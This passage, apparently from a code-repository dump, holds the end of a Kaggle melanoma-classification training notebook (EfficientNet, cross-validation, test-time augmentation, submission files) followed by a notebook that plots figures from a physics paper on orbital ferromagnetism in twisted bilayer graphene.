+ '/train%.2i*.tfrec' % x for x in idxT]) # 2020 data # TRAINING_FILENAMES += tf.io.gfile.glob([GCS_MALIGNANT_PATH + '/train%.2i*.tfrec' % ((x*2+1)+30) for x in idxT]) # 2019 data # TRAINING_FILENAMES += tf.io.gfile.glob([GCS_MALIGNANT_PATH + '/train%.2i*.tfrec' % ((x*2)+30) for x in idxT]) # 2018 data # TRAINING_FILENAMES += tf.io.gfile.glob([GCS_MALIGNANT_PATH + '/train%.2i*.tfrec' % (x+15) for x in idxT]) # new data np.random.shuffle(TRAINING_FILENAMES) files_valid = tf.io.gfile.glob([GCS_PATH + '/train%.2i*.tfrec'%x for x in idxV]) TEST_FILENAMES = np.sort(np.array(tf.io.gfile.glob(GCS_PATH + '/test*.tfrec'))) ct_valid = count_data_items(files_valid) ct_test = count_data_items(TEST_FILENAMES) VALID_STEPS = config['TTA_STEPS'] * ct_valid/config['BATCH_SIZE']/4/REPLICAS TEST_STEPS = config['TTA_STEPS'] * 
ct_test/config['BATCH_SIZE']/4/REPLICAS # BUILD MODEL K.clear_session() with strategy.scope(): model = model_fn((config['HEIGHT'], config['WIDTH'], config['CHANNELS'])) model_path_best = f'model_{fold}.h5' model_path_last = f'model_{fold}_last.h5' checkpoint = ModelCheckpoint(model_path_best, monitor='val_loss', mode='min', save_best_only=True, save_weights_only=True, verbose=0) # TRAIN history = model.fit(get_dataset(TRAINING_FILENAMES, augment=data_augment, shuffle=True, repeat=True, dim=config['HEIGHT'], batch_size=config['BATCH_SIZE']), validation_data=get_dataset(files_valid,augment=None,shuffle=False, repeat=False,dim=config['HEIGHT']), steps_per_epoch=count_data_items(TRAINING_FILENAMES)/config['BATCH_SIZE']//REPLICAS, callbacks=[checkpoint, get_lr_callback(config['BATCH_SIZE'])], epochs=config['EPOCHS'], verbose=2).history history_list.append(history) model.save_weights(model_path_last) # Load best weights model.load_weights(model_path_best) # PREDICT OOF USING TTA (last) print('Predicting OOF with TTA (last)...') ds_valid = get_dataset(files_valid, labeled=False, return_image_names=False, augment=data_augment_tta, repeat=True, shuffle=False, dim=config['HEIGHT'], batch_size=config['BATCH_SIZE']*4) pred = model.predict(ds_valid, steps=VALID_STEPS, verbose=2)[:config['TTA_STEPS']*ct_valid,] oof_pred_last.append(np.mean(pred.reshape((ct_valid, config['TTA_STEPS']), order='F'),axis=1)) # PREDICT TEST USING TTA (last) print('Predicting Test with TTA (last)...') ds_test = get_dataset(TEST_FILENAMES, labeled=False, return_image_names=False, augment=data_augment_tta, repeat=True, shuffle=False, dim=config['HEIGHT'], batch_size=config['BATCH_SIZE']*4) pred = model.predict(ds_test, steps=TEST_STEPS, verbose=2)[:config['TTA_STEPS']*ct_test,] preds_last[:,0] += np.mean(pred.reshape((ct_test, config['TTA_STEPS']), order='F'), axis=1) / config['N_USED_FOLDS'] # # Load best weights # model.load_weights(model_path_best) # PREDICT OOF USING TTA (best) print('Predicting OOF 
with TTA (best)...') ds_valid = get_dataset(files_valid, labeled=False, return_image_names=False, augment=data_augment, repeat=True, shuffle=False, dim=config['HEIGHT'], batch_size=config['BATCH_SIZE']*4) pred = model.predict(ds_valid, steps=VALID_STEPS, verbose=2)[:config['TTA_STEPS']*ct_valid,] oof_pred.append(np.mean(pred.reshape((ct_valid, config['TTA_STEPS']), order='F'), axis=1)) # GET OOF TARGETS AND NAMES ds_valid = get_dataset(files_valid, augment=None, repeat=False, dim=config['HEIGHT'], labeled=True, return_image_names=True) oof_tar.append(np.array([target.numpy() for img, target in iter(ds_valid.unbatch())])) oof_folds.append(np.ones_like(oof_tar[-1], dtype='int8')*fold) ds = get_dataset(files_valid, augment=None, repeat=False, dim=config['HEIGHT'], labeled=False, return_image_names=True) oof_names.append(np.array([img_name.numpy().decode("utf-8") for img, img_name in iter(ds.unbatch())])) # PREDICT TEST USING TTA (best) print('Predicting Test with TTA (best)...') ds_test = get_dataset(TEST_FILENAMES, labeled=False, return_image_names=False, augment=data_augment, repeat=True, shuffle=False, dim=config['HEIGHT'], batch_size=config['BATCH_SIZE']*4) pred = model.predict(ds_test, steps=TEST_STEPS, verbose=2)[:config['TTA_STEPS']*ct_test,] preds[:,0] += np.mean(pred.reshape((ct_test, config['TTA_STEPS']), order='F'), axis=1) / config['N_USED_FOLDS'] # REPORT RESULTS auc = roc_auc_score(oof_tar[-1], oof_pred[-1]) auc_last = roc_auc_score(oof_tar[-1], oof_pred_last[-1]) oof_val.append(np.max(history['val_auc'])) print('#### FOLD %i OOF AUC = %.3f, with TTA (best) = %.3f, with TTA (last) = %.3f' % (fold+1, oof_val[-1], auc, auc_last)) # - # ## Model loss graph # + _kg_hide-input=true for n_fold, history in enumerate(history_list): print(f'Fold: {n_fold + 1}') plt.figure(figsize=(15,5)) plt.plot(np.arange(config['EPOCHS']), history['auc'],'-o',label='Train AUC',color='#ff7f0e') plt.plot(np.arange(config['EPOCHS']), history['val_auc'],'-o',label='Val 
AUC',color='#1f77b4') x = np.argmax(history['val_auc']) y = np.max(history['val_auc']) xdist = plt.xlim()[1] - plt.xlim()[0] ydist = plt.ylim()[1] - plt.ylim()[0] plt.scatter(x,y,s=200,color='#1f77b4') plt.text(x-0.03*xdist,y-0.13*ydist,'max auc\n%.2f'%y,size=14) plt.ylabel('AUC',size=14) plt.xlabel('Epoch',size=14) plt.legend(loc=2) plt2 = plt.gca().twinx() plt2.plot(np.arange(config['EPOCHS']), history['loss'],'-o',label='Train Loss',color='#2ca02c') plt2.plot(np.arange(config['EPOCHS']), history['val_loss'],'-o',label='Val Loss',color='#d62728') x = np.argmin(history['val_loss']) y = np.min(history['val_loss']) ydist = plt.ylim()[1] - plt.ylim()[0] plt.scatter(x,y,s=200,color='#d62728') plt.text(x-0.03*xdist,y+0.05*ydist,'min loss',size=14) plt.ylabel('Loss',size=14) plt.title('FOLD %i - Image Size %i' % (n_fold+1, config['HEIGHT']), size=18) plt.legend(loc=3) plt.show() # - # ## Model loss graph aggregated # + _kg_hide-input=true plot_metrics_agg(history_list, config['N_USED_FOLDS']) # - # # Model evaluation # + _kg_hide-input=true # COMPUTE OVERALL OOF AUC (last) oof = np.concatenate(oof_pred_last) true = np.concatenate(oof_tar) names = np.concatenate(oof_names) folds = np.concatenate(oof_folds) auc = roc_auc_score(true, oof) print('Overall OOF AUC with TTA (last) = %.3f' % auc) # COMPUTE OVERALL OOF AUC oof = np.concatenate(oof_pred) true = np.concatenate(oof_tar) names = np.concatenate(oof_names) folds = np.concatenate(oof_folds) auc = roc_auc_score(true, oof) print('Overall OOF AUC with TTA = %.3f' % auc) # SAVE OOF TO DISK df_oof = pd.DataFrame(dict(image_name=names, target=true, pred=oof, fold=folds)) df_oof.to_csv('oof.csv', index=False) df_oof.head() # - # # Visualize test predictions # + _kg_hide-input=true ds = get_dataset(TEST_FILENAMES, augment=False, repeat=False, dim=config['HEIGHT'], labeled=False, return_image_names=True) image_names = np.array([img_name.numpy().decode("utf-8") for img, img_name in iter(ds.unbatch())]) submission = 
pd.DataFrame(dict(image_name=image_names, target=preds[:,0], target_last=preds_last[:,0])) submission = submission.sort_values('image_name') print(f"Test predictions {len(submission[submission['target'] > .5])}|{len(submission[submission['target'] <= .5])}") print(f"Test predictions (last) {len(submission[submission['target_last'] > .5])}|{len(submission[submission['target_last'] <= .5])}") print('Top 10 samples') display(submission.head(10)) print('Top 10 positive samples') display(submission.query('target > .5').head(10)) fig = plt.subplots(figsize=(20, 5)) plt.hist(submission['target'], bins=100) plt.show() fig = plt.subplots(figsize=(20, 5)) plt.hist(submission['target_last'], bins=100) plt.show() # - # # Test set predictions # + _kg_hide-input=true submission['target_blend'] = (submission['target'] * .5) + (submission['target_last'] * .5) display(submission.head(10)) display(submission.describe().T) ### BEST ### submission[['image_name', 'target']].to_csv('submission.csv', index=False) ### LAST ### submission_last = submission[['image_name', 'target_last']] submission_last.columns = ['image_name', 'target'] submission_last.to_csv('submission_last.csv', index=False) ### BLEND ### submission_blend = submission[['image_name', 'target_blend']] submission_blend.columns = ['image_name', 'target'] submission_blend.to_csv('submission_blend.csv', index=False)
Model backlog/Train/115-melanoma-5fold-efficientnetb6-256-malig-2020.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Introduction # This Jupyter notebook loads data and generates figures from: # # **Evidence of orbital ferromagnetism in twisted bilayer graphene aligned to hexagonal boron nitride** # # Authors: <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME> import sys print(sys.version) # # Initialization import json from cycler import cycler import numpy as np import matplotlib.pyplot as plt # %matplotlib inline # + # Set default plotting parameters plt.rcParams['axes.prop_cycle'] = cycler( color=['#E24A33', '#348ABD', '#988ED5', '#777777', '#FBC15E', '#8EBA42', '#FFB5B8']) plt.rcParams['axes.linewidth'] = 1 plt.rcParams['xtick.direction'] = 'in' plt.rcParams['xtick.top'] = 'True' plt.rcParams['xtick.major.size'] = 5 plt.rcParams['xtick.major.width'] = 1 plt.rcParams['xtick.minor.size'] = 2.5 plt.rcParams['xtick.minor.width'] = 1 plt.rcParams['ytick.direction'] = 'in' plt.rcParams['ytick.right'] = 'True' plt.rcParams['ytick.major.size'] = 5 plt.rcParams['ytick.major.width'] = 1 plt.rcParams['ytick.minor.size'] = 2.5 plt.rcParams['ytick.minor.width'] = 1 plt.rcParams['lines.linewidth'] = 1.5 plt.rcParams['font.size'] = 12 plt.rcParams['axes.labelsize'] = 12 # - # # Load data # + def import_data(file): with open(file, 'r') as f: json_load = json.load(f) return json_load fig1 = import_data('data/fig1.json') fig2 = import_data('data/fig2.json') fig3 = import_data('data/fig3.json') figs2 = import_data('data/figs2.json') figs3 = import_data('data/figs3.json') figs4 = import_data('data/figs4.json') figs5a = import_data('data/figs5a.json') figs5b = import_data('data/figs5b.json') figs6 = import_data('data/figs6.json') figs7 = import_data('data/figs7.json') figs8 = import_data('data/figs8.json') # - # # Figure 1 # **Angular dependence of magnetic 
hysteresis loops.** # # Magnetic field dependence of the Hall resistance $R_{yx}$ with $n/n_s = 0.746$ and $D/\epsilon_0 = -0.30\ \mathrm{V/nm}$ at $29\ \mathrm{mK}$ as a function of the angle of the device relative to the field direction; $0^\circ$ corresponds to field in the plane of the sample. The hysteresis loops are plotted as a function of (a) the applied field $B$ and (b) the component of the field perpendicular to the plane of the sample $B_\perp$. # The solid and dashed lines correspond to sweeping the magnetic field $B$ up and down, respectively. Inset: schematic diagram displaying the components of the magnetic field $B$ at the sample (shown in purple) for a given tilt angle $\theta$ # ## 1A # + fig, ax = plt.subplots(figsize=(2*1.618, 2)) fig.patch.set_facecolor('white') col = plt.get_cmap('inferno') for i, theta in enumerate(fig1['thetas_deg']): plt.plot(fig1['dn_B'][i], fig1['dn_ryx'][i], color=col(i/len(fig1['thetas_deg'])), label=fig1['labels'][i]) plt.plot(fig1['up_B'][i], fig1['up_ryx'][i], color=col(i/len(fig1['thetas_deg'])), linestyle='--') plt.xlim(-8, 8) plt.ylim(-8, 9) plt.xlabel(r'$B\ (\mathrm{T})$') plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$') plt.savefig('figures/fig1a.pdf', bbox_inches='tight', transparent=True) # - # ## 1B # + fig, ax = plt.subplots(figsize=(2*1.618, 2)) fig.patch.set_facecolor('white') col = plt.get_cmap('inferno') for i, theta in enumerate(fig1['thetas_deg']): plt.plot(np.sin(fig1['thetas'][i])*np.array(fig1['dn_B'][i]), fig1['dn_ryx'][i], color=col(i/len(fig1['thetas_deg'])), label=fig1['labels'][i]) plt.plot(np.sin(fig1['thetas'][i])*np.array(fig1['up_B'][i]), fig1['up_ryx'][i], color=col(i/len(fig1['thetas_deg'])), linestyle='--') ax.text(0.05, 0.095+0.085*i, fig1['labels'][i], transform=ax.transAxes, fontsize=7, va='top', ha='left', color=col(i/(len(fig1['thetas_deg'])))) plt.xlim(-1.6, 1.6) plt.ylim(-9, 9) plt.xlabel(r'$B_{\mathrm{\perp}}\ (\mathrm{T})$') plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$') 
plt.savefig('figures/fig1b.pdf', bbox_inches='tight', transparent=True) # - # # Figure 2 # **Hysteresis loops for small tilt angles.** # # Angular dependence of $R_{yx}$ vs $B$ with $n/n_s = 0.746$ and $D/\epsilon_0 = -30\ \mathrm{V/nm}$ for angles of the field relative to the plane of the sample: (a) $4.71^\circ \pm 0.10^\circ$, (b) $1.82^\circ \pm 0.10^\circ$, (c) $0.85^\circ \pm 0.10^\circ$, (d) $+0.223^\circ \pm 0.049^\circ$, and $-0.171^\circ \pm 0.025^\circ$. Vertical dashed black lines indicate where the out-of-plane component of the field equals the coercive field $\pm 119\ \mathrm{mT}$. The out-of-plane component of the field is raised beyond the coercive field in panels (a),(b), just reaches the coercive field in (c), and does not reach it in (d). All traces were taken at $27\ \mathrm{mK}$ except for the trace with tilt angle $+0.223^\circ \pm 0.049^\circ$, which was taken at $1.35\ \mathrm{K}$. # ## 2A # + fig, ax = plt.subplots(figsize=(2*1.618, 2)) fig.patch.set_facecolor('white') ind = 0 plt.plot(fig2['dn_B'][ind], fig2['dn_ryx'][ind], color='C0', label=fig2['labels'][ind]) plt.plot(fig2['up_B'][ind], fig2['up_ryx'][ind], color='C0', linestyle='--') plt.xlim(-8, 8) plt.ylim(-9, 9) plt.xlabel(r'$B\ (\mathrm{T})$') plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$') ax.text(0.60, 0.915, fig2['labels'][ind], transform=ax.transAxes, fontsize=10, va='top', ha='left', color='C0') Bc = 0.119 theta = 4.71*np.pi/180 plt.axvline( Bc/np.sin(theta), ymin=0.0, ymax=0.7, color='k', linestyle='--', alpha=0.8) plt.axvline(-Bc/np.sin(theta), ymin=0.15, ymax=0.93, color='k', linestyle='--', alpha=0.8) plt.savefig('figures/fig2a.pdf', bbox_inches='tight', transparent=True) # - # ## 2B # + fig, ax = plt.subplots(figsize=(2*1.618, 2)) fig.patch.set_facecolor('white') ind = 1 plt.plot(fig2['dn_B'][ind], fig2['dn_ryx'][ind], color='C0', label=fig2['labels'][ind]) plt.plot(fig2['up_B'][ind], fig2['up_ryx'][ind], color='C0', linestyle='--') plt.xlim(-8, 8) plt.ylim(-9, 9) 
plt.xlabel(r'$B\ (\mathrm{T})$')
plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$')

ax.text(0.60, 0.915, fig2['labels'][ind], transform=ax.transAxes,
        fontsize=10, va='top', ha='left', color='C0')

# Mark where the out-of-plane field component equals the coercive field.
Bc = 0.119
theta = 1.82*np.pi/180
plt.axvline( Bc/np.sin(theta), ymin=0.0, ymax=0.4, color='k', linestyle='--', alpha=0.8)
plt.axvline(-Bc/np.sin(theta), ymin=0.4, ymax=0.8, color='k', linestyle='--', alpha=0.8)

plt.savefig('figures/fig2b.pdf', bbox_inches='tight', transparent=True)
# -

# ## 2C

# +
fig, ax = plt.subplots(figsize=(2*1.618, 2))
fig.patch.set_facecolor('white')

# Panel (c): the tilt angle where B_perp just reaches the coercive field.
ind = 2
plt.plot(fig2['dn_B'][ind], fig2['dn_ryx'][ind], color='C0', label=fig2['labels'][ind])
plt.plot(fig2['up_B'][ind], fig2['up_ryx'][ind], color='C0', linestyle='--')

plt.xlim(-8, 8)
plt.ylim(-9, 9)
plt.xlabel(r'$B\ (\mathrm{T})$')
plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$')

ax.text(0.60, 0.915, fig2['labels'][ind], transform=ax.transAxes,
        fontsize=10, va='top', ha='left', color='C0')

plt.savefig('figures/fig2c.pdf', bbox_inches='tight', transparent=True)
# -

# ## 2D

# +
fig, ax = plt.subplots(figsize=(2*1.618, 2))
fig.patch.set_facecolor('white')

# Panel (d): the two smallest tilt angles, overlaid in different colors.
ind = 3
plt.plot(fig2['dn_B'][ind], fig2['dn_ryx'][ind], color='C0', label=fig2['labels'][ind])
plt.plot(fig2['up_B'][ind], fig2['up_ryx'][ind], color='C0', linestyle='--')
ind = 4
plt.plot(fig2['dn_B'][ind], fig2['dn_ryx'][ind], color='C1', label=fig2['labels'][ind])
plt.plot(fig2['up_B'][ind], fig2['up_ryx'][ind], color='C1', linestyle='--')

plt.xlim(-8, 8)
plt.ylim(-9, 9)
plt.xlabel(r'$B\ (\mathrm{T})$')
plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$')

ind = 3
ax.text(0.60, 0.915, fig2['labels'][ind], transform=ax.transAxes,
        fontsize=10, va='top', ha='left', color='C0')
ind = 4
ax.text(0.60, 0.815, fig2['labels'][ind], transform=ax.transAxes,
        fontsize=10, va='top', ha='left', color='C1')

# BUG FIX: this panel previously saved to 'figures/fig2b.pdf', silently
# overwriting the output of panel 2B; save panel (d) under its own name.
plt.savefig('figures/fig2d.pdf', bbox_inches='tight', transparent=True)
# -

# # Figure 3

# **Erasing the initial magnetic state.**
#
# In-plane hysteresis loops of $R_{yx}$ with
$n/n_s = 0.746$ and $D/\epsilon_0 = -30\ \mathrm{V/nm}$ at $26\ \mathrm{mK}$. The sample is initially polarized with an out-of-plane field. The sample is then rotated to $-57 \pm 21\ \mathrm{mdeg}$ in zero magnetic field. The in-plane magnetic field $B_{\parallel}$ is then increased from zero (red trace) before completing a hysteresis loop (blue solid and dashed traces). # + fig, ax = plt.subplots(figsize=(4*1.618, 4)) fig.patch.set_facecolor('white') plt.plot(np.cos(fig3['thetas'][0])*np.array(fig3['dn_B'][0]), fig3['dn_ryx'][0], label='Initial sweep up') plt.plot(np.cos(fig3['thetas'][0])*np.array(fig3['dn_B'][1]), fig3['dn_ryx'][1], color='C0') plt.plot(np.cos(fig3['thetas'][0])*np.array(fig3['up_B'][0]), fig3['up_ryx'][0], linestyle='--', label='Sweep down') plt.plot(np.cos(fig3['thetas'][0])*np.array(fig3['dn_B'][2]), fig3['dn_ryx'][2], color='C1', label='Sweep up') plt.plot(np.cos(fig3['thetas'][0])*np.array(fig3['dn_B'][3]), fig3['dn_ryx'][3], color='C1') plt.xlim(-14, 14) plt.ylim(-8.5, 6.5) plt.xlabel(r'$B_{||}\ (\mathrm{T})$') plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$') plt.legend(fontsize=10, frameon=False, loc='lower left') plt.savefig('figures/fig3_raw.pdf', bbox_inches='tight', transparent=True) # - # # Figure S2 # **Angular dependence of longitudinal Resistance in magnetic hysteresis loops.** # # Magnetic field dependence of the longitudinal resistance $R_{xx}$ corresponding to the data shown in Fig. 1 of the main text, with $n/n_s = 0.746$ and $D/\epsilon_0 = -0.30\ \mathrm{V/nm}$ at $29\ \mathrm{mK}$ as a function of the angle of the device relative to the field direction; $0^\circ$ corresponds to field in the plane of the sample. The hysteresis loops are plotted as a function of (a) the applied field $B$ and (b) the component of the field perpendicular to the plane of the sample $B_\perp$. The solid and dashed lines correspond to sweeping the magnetic field $B$ up and down, respectively. 
# ## S2A

# +
fig, ax = plt.subplots(figsize=(2*1.618, 2))
fig.patch.set_facecolor('white')

col = plt.get_cmap('inferno')

# One trace per tilt angle, colored along the 'inferno' colormap;
# solid lines are sweeps down, dashed are sweeps up.
for i, theta in enumerate(figs2['thetas_deg']):
    plt.plot(figs2['dn_B'][i], figs2['dn_rxx'][i],
             color=col(i/len(figs2['thetas_deg'])), label=figs2['labels'][i])
    plt.plot(figs2['up_B'][i], figs2['up_rxx'][i],
             color=col(i/len(figs2['thetas_deg'])), linestyle='--')

plt.xlim(-8, 8)
plt.ylim(-2, 19.9)
plt.xlabel(r'$B\ (\mathrm{T})$')
plt.ylabel(r'$R_{xx}\ (\mathrm{k\Omega})$')

plt.savefig('figures/figs2a.pdf', bbox_inches='tight', transparent=True)
# -

# ## S2B

# +
fig, ax = plt.subplots(figsize=(2*1.618, 2))
fig.patch.set_facecolor('white')

col = plt.get_cmap('inferno')

# Same data, plotted against the out-of-plane component sin(theta)*B.
for i, theta in enumerate(figs2['thetas_deg']):
    plt.plot(np.sin(figs2['thetas'][i])*np.array(figs2['dn_B'][i]), figs2['dn_rxx'][i],
             color=col(i/len(figs2['thetas_deg'])), label=figs2['labels'][i])
    plt.plot(np.sin(figs2['thetas'][i])*np.array(figs2['up_B'][i]), figs2['up_rxx'][i],
             color=col(i/len(figs2['thetas_deg'])), linestyle='--')
    ax.text(0.70, 0.095+0.085*i, figs2['labels'][i], transform=ax.transAxes,
            fontsize=7, va='top', ha='left', color=col(i/(len(figs2['thetas_deg']))))

plt.xlim(-1.6, 1.6)
plt.ylim(-2, 19.9)
# BUG FIX: the x data in this panel is the perpendicular component of the
# field, so label it B_perp (as in Fig. 1b), not B.
plt.xlabel(r'$B_{\mathrm{\perp}}\ (\mathrm{T})$')
plt.ylabel(r'$R_{xx}\ (\mathrm{k\Omega})$')

# BUG FIX: previously saved as 'figures/figs2a.pdf', clobbering panel S2A.
plt.savefig('figures/figs2b.pdf', bbox_inches='tight', transparent=True)
# -

# # Figure S3

# **Longitudinal resistance hysteresis loops for nearly in-plane fields.**
#
# Angular dependence of the longitudinal resistance $R_{xx}$ vs $B$ corresponding to the data shown in Fig. 2 of the main text with $n/n_s = 0.746$ and $D/\epsilon_0 = -30\ \mathrm{V/nm}$ for angles of the field relative to the plane of the sample: (a) $4.71^\circ \pm 0.10^\circ$, (b) $1.82^\circ \pm 0.10^\circ$, (c) $0.85^\circ \pm 0.10^\circ$, (d) $+0.223^\circ \pm 0.049^\circ$, and $-0.171^\circ \pm 0.025^\circ$. 
Vertical dashed black lines indicate where the out-of-plane component of the field equals the coercive field $\pm 119\ \mathrm{mT}$. The out-of-plane component of the field is raised beyond the coercive field in panels (a),(b), just reaches the coercive field in (c), and does not reach it in (d). All traces were taken at $27\ \mathrm{mK}$ except for the trace with tilt angle $+0.223^\circ \pm 0.049^\circ$, which was taken at $1.35\ \mathrm{K}$. # ## S3A # + fig, ax = plt.subplots(figsize=(2*1.618, 2)) fig.patch.set_facecolor('white') ind = 0 plt.plot(figs3['dn_B'][ind], figs3['dn_rxx'][ind], color='C0', label=figs3['labels'][ind]) plt.plot(figs3['up_B'][ind], figs3['up_rxx'][ind], color='C0', linestyle='--') plt.xlim(-8, 8) plt.ylim(6.75, 12.75) plt.xlabel(r'$B\ (\mathrm{T})$') plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$') ax.text(0.05, 0.915, figs3['labels'][ind], transform=ax.transAxes, fontsize=10, va='top', ha='left', color='C0') Bc = 0.119 theta = 4.71*np.pi/180 plt.axvline( Bc/np.sin(theta), ymin=0.3, ymax=0.92, color='k', linestyle='--', alpha=0.8) plt.axvline(-Bc/np.sin(theta), ymin=0.00, ymax=0.7, color='k', linestyle='--', alpha=0.8) plt.savefig('figures/figs3a.pdf', bbox_inches='tight', transparent=True) # - # ## S3B # + fig, ax = plt.subplots(figsize=(2*1.618, 2)) fig.patch.set_facecolor('white') ind = 1 plt.plot(figs3['dn_B'][ind], figs3['dn_rxx'][ind], color='C0', label=figs3['labels'][ind]) plt.plot(figs3['up_B'][ind], figs3['up_rxx'][ind], color='C0', linestyle='--') plt.xlim(-8, 8) plt.ylim(6.75, 12.75) plt.xlabel(r'$B\ (\mathrm{T})$') plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$') ax.text(0.05, 0.915, figs3['labels'][ind], transform=ax.transAxes, fontsize=10, va='top', ha='left', color='C0') Bc = 0.119 theta = 1.82*np.pi/180 plt.axvline( Bc/np.sin(theta), ymin=0.3, ymax=0.92, color='k', linestyle='--', alpha=0.8) plt.axvline(-Bc/np.sin(theta), ymin=0.00, ymax=0.7, color='k', linestyle='--', alpha=0.8) plt.savefig('figures/figs3b.pdf', 
bbox_inches='tight', transparent=True) # - # ## S3C # + fig, ax = plt.subplots(figsize=(2*1.618, 2)) fig.patch.set_facecolor('white') ind = 2 plt.plot(figs3['dn_B'][ind], figs3['dn_rxx'][ind], color='C0', label=figs3['labels'][ind]) plt.plot(figs3['up_B'][ind], figs3['up_rxx'][ind], color='C0', linestyle='--') plt.xlim(-8, 8) plt.ylim(6.75, 12.75) plt.xlabel(r'$B\ (\mathrm{T})$') plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$') ax.text(0.05, 0.915, figs3['labels'][ind], transform=ax.transAxes, fontsize=10, va='top', ha='left', color='C0') plt.savefig('figures/figs3c.pdf', bbox_inches='tight', transparent=True) # - # ## S3D # + fig, ax = plt.subplots(figsize=(2*1.618, 2)) fig.patch.set_facecolor('white') ind = 3 plt.plot(figs3['dn_B'][ind], figs3['dn_rxx'][ind], color='C0', label=figs3['labels'][ind]) plt.plot(figs3['up_B'][ind], figs3['up_rxx'][ind], color='C0', linestyle='--') ind = 4 plt.plot(figs3['dn_B'][ind], figs3['dn_rxx'][ind], color='C1', label=figs3['labels'][ind]) plt.plot(figs3['up_B'][ind], figs3['up_rxx'][ind], color='C1', linestyle='--') plt.xlim(-8, 8) plt.ylim(6.75, 12.75) plt.xlabel(r'$B\ (\mathrm{T})$') plt.ylabel(r'$R_{xx}\ (\mathrm{k\Omega})$') ind = 3 ax.text(0.60, 0.915, figs3['labels'][ind], transform=ax.transAxes, fontsize=10, va='top', ha='left', color='C0') ind = 4 ax.text(0.60, 0.815, figs3['labels'][ind], transform=ax.transAxes, fontsize=10, va='top', ha='left', color='C1') plt.savefig('figures/figs3d.pdf', bbox_inches='tight', transparent=True) # - # # Figure S4 # **Longitudinal resistance under an in-plane field from an initially magnetized state.** # # In-plane hysteresis loops of the (a) longitudinal resistance $R_{xx}$ corresponding to the data shown in Fig. 3 of the main text with $n/n_s = 0.746$ and $D/\epsilon_0 = -30\ \mathrm{V/nm}$ at $26\ \mathrm{mK}$. The Hall resistance data $R_{yx}$ of Fig. 3 of the main text are replicated in panel (b). The sample is initially polarized with an out-of-plane field. 
The sample is then rotated to $-57 \pm 21 \mathrm{mdeg}$ in zero magnetic field. The field $B_{\parallel}$ is then increased from zero (red trace) before completing a hysteresis loop (blue solid and dashed traces). # + fig, ax = plt.subplots(figsize=(4*1.618, 4)) fig.patch.set_facecolor('white') plt.plot(np.cos(figs4['thetas'][0])*np.array(figs4['dn_B'][0]), figs4['dn_rxx'][0], label='Initial sweep up') plt.plot(np.cos(figs4['thetas'][0])*np.array(figs4['dn_B'][1]), figs4['dn_rxx'][1], color='C0') plt.plot(np.cos(figs4['thetas'][0])*np.array(figs4['up_B'][0]), figs4['up_rxx'][0], linestyle='--', label='Sweep down') plt.plot(np.cos(figs4['thetas'][0])*np.array(figs4['dn_B'][2]), figs4['dn_rxx'][2], color='C1', label='Sweep up') plt.plot(np.cos(figs4['thetas'][0])*np.array(figs4['dn_B'][3]), figs4['dn_rxx'][3], color='C1') plt.xlim(-14, 14) plt.xlabel(r'$B_{||}\ (\mathrm{T})$') plt.ylabel(r'$R_{xx}\ (\mathrm{k\Omega})$') plt.legend(fontsize=10, frameon=False, loc='upper left') plt.savefig('figures/figs4a.pdf', bbox_inches='tight', transparent=True) # - # # Figure S5 # **Assymmetric contribution of the Hall resistance under an in-plane field.** # # (a) Antisymmetric component of the Hall resistance $R_{yx}^{\mathrm{asym}}$ corresponding to the Hall data shown in Fig. 3 of the main text. $\pm R_{yx}^{\mathrm{asym}}$ is plotted as a solid (dashed) line. For $8\ \mathrm{T}$ and above (indicated by the large tick on the horizontal axis), we report $R_{yx}^{\mathrm{asym}}$ for the initial sweep up and the sweep down. Otherwise we report $R_{yx}^{\mathrm{asym}}$ for the sweep down and the sweep up (which was only completed up to $8\ \mathrm{T}$.) (b) Antisymmetric component of the Hall resistance $R_{yx}^{\mathrm{asym}}$ for the nearly out-of-plane hysteresis loop performed at $87.6^\circ \pm 1.0^\circ$, shown in Fig. 1 of the main text. (c) Schematic diagram of the symmetrization process for an ideal hysteresis loop that is offset from zero in the vertical direction. 
# ## S5A # + fig, ax = plt.subplots(figsize=(4*1.618, 4)) fig.patch.set_facecolor('white') plt.plot(figs5a['B_asym'], figs5a['ryx_asym'], 'C1') plt.plot(figs5a['B_asym'], -np.array(figs5a['ryx_asym']), '--C1') plt.plot(figs5a['B_asym_lo'], figs5a['ryx_asym_lo'], 'C1') plt.plot(figs5a['B_asym_lo'], -np.array(figs5a['ryx_asym_lo']), '--C1') plt.plot(figs5a['B_asym_hi'], figs5a['ryx_asym_hi'], 'C1') plt.plot(figs5a['B_asym_hi'], -np.array(figs5a['ryx_asym_hi']), '--C1') ax.text(0.65, 0.93, r'$-57 \pm 21\ \mathrm{mdeg}$', transform=ax.transAxes, fontsize=7, va='top', ha='left', color='C1') plt.xlim(-14, 14) plt.xlabel(r'$B_{\mathrm{||}} \ (\mathrm{T})$') plt.ylabel(r'$R_{yx}^{\mathrm{asym}}\ (\mathrm{k\Omega})$') plt.axvline(8, ymin=0, ymax=0.1, color='k', linewidth=1) plt.savefig('figures/figs5a.pdf', bbox_inches='tight', transparent=True) # - # ## S5B # + fig, ax = plt.subplots(figsize=(4*1.618, 4)) fig.patch.set_facecolor('white') plt.plot(figs5b['B_asym'], figs5b['ryx_asym'], 'C1') plt.plot(-np.array(figs5b['B_asym']), -np.array(figs5b['ryx_asym']), '--C1') ax.text(0.70, 0.93, r'$87.6^\circ \pm 1.0^\circ$', transform=ax.transAxes, fontsize=7, va='top', ha='left', color='C1') plt.xlim(-8, 8) plt.xlabel(r'$B_{\perp} \ (\mathrm{T})$') plt.ylabel(r'$R_{yx}^{\mathrm{asym}}\ (\mathrm{k\Omega})$') plt.savefig('figures/figs5b.pdf', bbox_inches='tight', transparent=True) # - # # Figure S6 # **Dependence on the magnitude of the in-plane field.** # # In-plane hysteresis loops of corresponding longitudinal resistance $R_{xx}$ to the data shown in Fig. 3 of the main text with $n/n_s 